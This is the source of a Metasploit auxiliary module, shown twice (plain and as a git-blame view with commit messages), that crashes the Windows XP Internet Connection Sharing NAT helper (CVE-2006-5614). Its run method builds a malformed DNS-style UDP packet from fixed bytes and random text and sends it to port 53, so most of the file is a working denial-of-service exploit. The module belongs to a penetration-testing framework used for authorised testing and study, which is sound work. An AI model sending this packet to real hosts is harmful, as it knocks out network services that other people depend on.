metasploit-framework/modules/auxiliary/dos/windows/nat/nat_helper.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Windows NAT Helper Denial of Service',
      'Description'    => %q{
        This module exploits a denial of service vulnerability
        within the Internet Connection Sharing service in
        Windows XP.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '30096'],
          [ 'BID', '20804' ],
          [ 'CVE', '2006-5614' ],
        ],
      'DisclosureDate' => 'Oct 26 2006'))

      register_options([Opt::RPORT(53),])
  end

  def run
    connect_udp

    pkt =  "\x6c\xb6\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    pkt << "\x03" + Rex::Text.rand_text_english(3) + "\x06"
    pkt << Rex::Text.rand_text_english(10) + "\x03"
    pkt << Rex::Text.rand_text_english(3)
    pkt << "\x00\x00\x01\x00\x01"

    print_status("Sending dos packet...")

    udp_sock.put(pkt)

    disconnect_udp
  end
end
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`
use https for metaploit.com links 2017-07-24 13:26:21 +00:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 13:02:44 +00:00			`class MetasploitModule < Msf::Auxiliary`
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Exploit::Remote::Udp`
			`include Msf::Auxiliary::Dos`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Microsoft Windows NAT Helper Denial of Service',`
			`'Description' => %q{`
			`This module exploits a denial of service vulnerability`
			`within the Internet Connection Sharing service in`
			`Windows XP.`
			`},`
			`'Author' => [ 'MC' ],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
Revert "Land #6812, remove broken OSVDB references" This reverts commit 2b016e02165b7abf85c6847fcae2b6131f8a504d, reversing changes made to 7b1d9596c7c95097ef750407ff61f010714434a1. 2016-07-15 17:00:31 +00:00			`[ 'OSVDB', '30096'],`
Retab modules 2013-08-30 21:28:54 +00:00			`[ 'BID', '20804' ],`
			`[ 'CVE', '2006-5614' ],`
			`],`
			`'DisclosureDate' => 'Oct 26 2006'))`

Fix msf/core and self.class msftidy warnings Also fixed rex requires. 2017-05-03 20:42:21 +00:00			`register_options([Opt::RPORT(53),])`
Retab modules 2013-08-30 21:28:54 +00:00			`end`

			`def run`
			`connect_udp`

			`pkt = "\x6c\xb6\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"`
			`pkt << "\x03" + Rex::Text.rand_text_english(3) + "\x06"`
			`pkt << Rex::Text.rand_text_english(10) + "\x03"`
			`pkt << Rex::Text.rand_text_english(3)`
			`pkt << "\x00\x00\x01\x00\x01"`

			`print_status("Sending dos packet...")`

			`udp_sock.put(pkt)`

			`disconnect_udp`
			`end`
Tag up all the DoS modules properly with the DoS mixin last git-svn-id: file:///home/svn/framework3/trunk@5949 4d416f70-5f16-0410-b530-b9f4589650da 2008-11-18 20:00:31 +00:00			`end`